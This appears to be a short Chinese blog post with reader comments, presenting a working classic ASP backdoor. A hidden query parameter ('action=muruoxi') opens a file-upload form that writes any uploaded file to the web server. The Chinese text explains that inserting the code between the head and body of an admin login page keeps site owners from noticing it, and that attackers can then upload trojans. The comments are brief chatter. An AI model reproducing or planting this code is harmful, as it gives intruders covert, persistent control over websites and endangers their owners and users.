<%if request.QueryString("action")="muruoxi" then
a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h=Createobject(b):h.Type=1:h.Open:c.Position=f+1:c.Copyto h,g-f-3:h.Position=0:h.type=2:h.CharSet="BIG5":i=h.Readtext:h.close:j=mid(i,InstrRev(i,"\")+1,g):k=Instrb(d,e&e)+4:l=Instrb(k+1,d,leftB(d,f-1))-k-2:h.Type=1:h.Open:c.Position=k-1:c.CopyTo h,l:h.SaveToFile server.mappath(j),2%><form enctype=multipart/form-data method=post><input type=file name=n><input type=submit></form>
<%end if%>
呐,上述代码插入某页面,比如你的后台登录页,加到</head>和<body>中,一般站长检查就会忽略,然而当攻击者访问你的后台登录页,如login.asp时加上参数action=muruoxi,构成语句login.asp?action=muruoxi,直接就能拥有上传木马的权限了……
突然发现这个后门给了我启发
2016年9月4日 下午1:10很可怕的网站后门。
2016年5月26日 上午12:41兄弟,交换链接吗?
2016年5月12日 下午12:24兄弟,佩服你说真话的勇气
2016年5月12日 下午12:33嘛意思? 我说假话了?
2016年5月12日 下午2:18